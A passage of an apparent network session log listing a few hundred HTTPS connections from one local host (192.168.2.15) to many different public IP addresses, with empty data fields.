                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19844192.168.2.1536948178.37.231.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19845192.168.2.154159691.255.246.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19846192.168.2.1552028112.1.186.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19847192.168.2.1548168217.166.217.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19848192.168.2.1550198222.241.138.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19849192.168.2.155935673.62.33.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19850192.168.2.154699617.227.130.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19851192.168.2.1560440221.158.250.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19852192.168.2.1533156193.163.123.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19853192.168.2.15606125.1.60.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19854192.168.2.155944294.111.47.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19855192.168.2.1557342119.182.247.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19856192.168.2.1559302201.18.122.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19857192.168.2.1541736143.149.26.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19858192.168.2.155846099.43.126.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19859192.168.2.1553038143.116.96.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19860192.168.2.1542456189.96.240.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19861192.168.2.153285085.52.95.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19862192.168.2.154395648.220.4.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19863192.168.2.1555152209.199.39.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19864192.168.2.1536548211.80.223.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19865192.168.2.15453124.138.107.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19866192.168.2.1536708145.153.182.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19867192.168.2.154785872.7.145.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19868192.168.2.154273274.93.42.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19869192.168.2.155791265.16.143.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19870192.168.2.155057252.217.90.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19871192.168.2.153974287.183.183.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19872192.168.2.154185477.45.173.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19873192.168.2.1557582213.3.49.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19874192.168.2.1535716183.235.174.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19875192.168.2.153288096.6.60.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19876192.168.2.15435369.194.184.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19877192.168.2.1549784193.56.161.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19878192.168.2.15328309.120.131.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19879192.168.2.155703068.38.54.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19880192.168.2.1534368125.66.47.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19881192.168.2.154334044.63.29.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19882192.168.2.1542950107.101.68.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19883192.168.2.1558396129.130.156.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19884192.168.2.1536422122.73.25.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19885192.168.2.1546842175.123.30.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19886192.168.2.1550486134.109.193.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19887192.168.2.155988643.46.31.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19888192.168.2.1547710183.42.231.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19889192.168.2.154261877.249.27.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19890192.168.2.154044264.175.132.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19891192.168.2.1552720166.143.193.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19892192.168.2.153606087.220.67.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19893192.168.2.1558936181.62.155.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19894192.168.2.154454077.56.218.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19895192.168.2.1558780164.129.202.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19896192.168.2.1555178147.235.116.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19897192.168.2.1543898150.79.48.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19898192.168.2.1538086168.158.45.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19899192.168.2.1543806125.115.127.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19900192.168.2.1560244187.109.65.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19901192.168.2.153739482.111.67.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19902192.168.2.1544816110.9.104.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19903192.168.2.1541410223.217.195.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19904192.168.2.1553012165.30.1.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19905192.168.2.1547500114.59.142.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19906192.168.2.154368070.157.46.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19907192.168.2.1558792181.27.178.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19908192.168.2.155063889.213.162.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19909192.168.2.1557658109.240.85.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19910192.168.2.155649631.66.12.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19911192.168.2.154085453.204.106.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19912192.168.2.1547034221.82.194.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19913192.168.2.1556278166.248.86.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19914192.168.2.1558018131.35.185.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19915192.168.2.155949843.83.7.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19916192.168.2.1548526119.230.220.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19917192.168.2.1551360203.12.89.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19918192.168.2.153838619.22.41.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19919192.168.2.155261686.67.188.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19920192.168.2.1553516124.111.241.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19921192.168.2.1543992148.46.135.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19922192.168.2.1549572143.224.227.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19923192.168.2.1535400139.182.202.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19924192.168.2.1551818201.116.81.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19925192.168.2.1540786132.197.90.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19926192.168.2.1542550113.63.51.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19927192.168.2.1543912173.201.152.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19928192.168.2.154847692.239.164.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19929192.168.2.154670899.223.44.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19930192.168.2.1556310163.251.241.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19931192.168.2.155721285.6.133.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19932192.168.2.1537938133.154.43.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19933192.168.2.156067660.193.196.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19934192.168.2.1557960210.24.139.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19935192.168.2.154111278.243.78.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19936192.168.2.1551594198.152.201.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19937192.168.2.154266873.71.191.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19938192.168.2.153566641.154.255.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19939192.168.2.154903297.18.135.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19940192.168.2.1558088153.216.20.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19941192.168.2.1559678104.117.57.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19942192.168.2.1560190124.0.108.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19943192.168.2.1544434195.203.28.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19944192.168.2.1534188173.27.63.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19945192.168.2.15581884.243.160.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19946192.168.2.1542512197.220.250.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19947192.168.2.1549666187.198.16.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19948192.168.2.155433078.9.80.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19949192.168.2.153472432.52.86.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19950192.168.2.153344861.155.72.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19951192.168.2.15426105.184.112.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19952192.168.2.1553024142.194.200.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19953192.168.2.1540618187.132.61.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19954192.168.2.1552408121.51.24.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19955192.168.2.1537148208.22.132.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19956192.168.2.1546338188.193.163.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19957192.168.2.15567704.206.204.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19958192.168.2.15595705.215.163.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19959192.168.2.1560124187.63.215.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19960192.168.2.1559292197.46.27.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19961192.168.2.153867036.191.34.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19962192.168.2.1550962158.110.97.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19963192.168.2.1536938134.154.193.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19964192.168.2.1542220209.146.18.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19965192.168.2.1535286120.34.167.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19966192.168.2.153770686.11.167.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19967192.168.2.1548778167.179.111.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19968192.168.2.1549148181.26.74.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19969192.168.2.154574647.237.140.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19970192.168.2.154592670.184.120.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19971192.168.2.1543282148.172.171.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19972192.168.2.153780097.166.202.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19973192.168.2.1557586223.102.220.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19974192.168.2.154312419.153.77.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19975192.168.2.1534478182.154.111.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19976192.168.2.1546608160.40.221.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19977192.168.2.155827670.178.61.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19978192.168.2.1551680199.157.56.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19979192.168.2.155736899.99.68.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19980192.168.2.1553334128.198.83.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19981192.168.2.1553304110.139.144.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19982192.168.2.1560012168.20.77.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19983192.168.2.1551200206.27.219.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19984192.168.2.1548344182.84.61.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19985192.168.2.1537340186.172.165.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19986192.168.2.1541556222.202.224.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19987192.168.2.1539920124.57.45.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19988192.168.2.1549208202.213.247.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19989192.168.2.1541512112.220.89.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19990192.168.2.155062096.140.77.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19991192.168.2.1552246129.149.44.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19992192.168.2.1556638212.178.127.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19993192.168.2.1559074173.36.14.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19994192.168.2.1559200143.113.33.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19995192.168.2.1539328120.108.48.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19996192.168.2.1541836151.153.207.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19997192.168.2.154212664.220.164.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19998192.168.2.155116042.63.204.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19999192.168.2.1552742101.240.173.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20000192.168.2.1558124216.155.115.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20001192.168.2.1539898216.205.133.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20002192.168.2.154429299.9.20.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20003192.168.2.1534866206.77.194.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20004192.168.2.155655266.136.99.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20005192.168.2.1547914109.70.115.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20006192.168.2.154346449.245.100.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20007192.168.2.1538098130.67.93.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20008192.168.2.1535750157.0.44.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20009192.168.2.1542864151.232.1.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20010192.168.2.155257473.84.236.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20011192.168.2.1555692155.44.53.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20012192.168.2.154510094.50.200.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20013192.168.2.1538684128.89.65.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20014192.168.2.15514889.87.51.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20015192.168.2.1533152183.249.7.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20016192.168.2.155269413.226.163.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20017192.168.2.1539518222.238.226.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20018192.168.2.1552926133.254.135.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20019192.168.2.1550572108.185.12.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20020192.168.2.1546442208.255.176.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20021192.168.2.155403461.189.164.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20022192.168.2.155924214.160.29.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20023192.168.2.1549456132.67.33.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20024192.168.2.1537684107.251.101.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20025192.168.2.153958818.239.210.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20026192.168.2.1550848120.75.101.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20027192.168.2.155895441.232.231.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20028192.168.2.1540490170.66.240.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20029192.168.2.1554098140.158.117.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20030192.168.2.1550730178.183.61.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20031192.168.2.1545124190.189.72.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20032192.168.2.156081692.98.44.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20033192.168.2.1559898110.76.213.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20034192.168.2.153856693.221.90.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20035192.168.2.1537880174.174.21.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20036192.168.2.1543144201.201.119.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20037192.168.2.1547052197.58.168.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20038192.168.2.153733495.63.37.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20039192.168.2.15596841.41.131.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20040192.168.2.153982248.61.150.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20041192.168.2.154298868.66.4.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20042192.168.2.1555728150.10.56.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20043192.168.2.1545572151.48.36.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20044192.168.2.1550236137.244.29.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20045192.168.2.155835242.87.136.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20046192.168.2.1551906211.110.208.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20047192.168.2.155970059.227.45.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20048192.168.2.155859857.38.9.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20049192.168.2.1546638177.156.103.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20050192.168.2.154691644.188.7.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20051192.168.2.1544268178.141.252.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20052192.168.2.155016067.76.9.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20053192.168.2.154630634.127.12.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20054192.168.2.153849865.152.71.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20055192.168.2.1534930144.111.65.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20056192.168.2.155039452.231.63.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20057192.168.2.153728689.113.21.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20058192.168.2.1545322144.160.27.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20059192.168.2.1535458216.247.104.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20060192.168.2.1549160184.184.182.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20061192.168.2.155467885.190.61.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20062192.168.2.1535378141.129.75.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20063192.168.2.1550322170.163.6.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20064192.168.2.1545564172.49.164.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20065192.168.2.1540674202.247.166.179443
